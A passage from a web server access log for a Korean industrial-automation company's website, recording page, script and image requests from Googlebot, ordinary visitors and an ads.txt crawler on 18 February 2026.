+0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico/ads.txt" [Client 51.159.107.135] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[18/Feb/2026:07:03:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico/app-ads.txt" [Client 51.159.107.135] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[18/Feb/2026:07:03:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico/sellers.json" [Client 51.159.107.135] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 51.159.107.135] [Length 401230] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 51.159.107.135] [Length 352184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 51.159.107.135] [Length 347164] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 51.159.107.135] [Length 308187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 51.159.107.135] [Length 289503] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 51.159.107.135] [Length 315872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 51.159.107.135] [Length 273944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 51.159.107.135] [Length 273944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:57:19 +0000] - - 301 - GET http www.hanmocnn.co.kr "/robots.txt" [Client 66.249.66.32] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:57:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 66.249.66.169] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:57:20 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.76] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:57:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.193] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:58:20 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.78] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:58:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.169] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.2] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:58:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.169] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:58:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.193] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:07:58:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 66.249.66.15] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Googlebot-Image/1.0" "-" +[18/Feb/2026:07:58:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 66.249.66.2] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 66.249.66.160] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 66.249.66.15] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 66.249.66.194] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 66.249.66.38] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 66.249.66.15] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 66.249.66.160] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 66.249.66.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:07:58:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 66.249.66.15] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Googlebot-Image/1.0" "-" +[18/Feb/2026:09:12:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.78] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10545] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:02:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10546] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 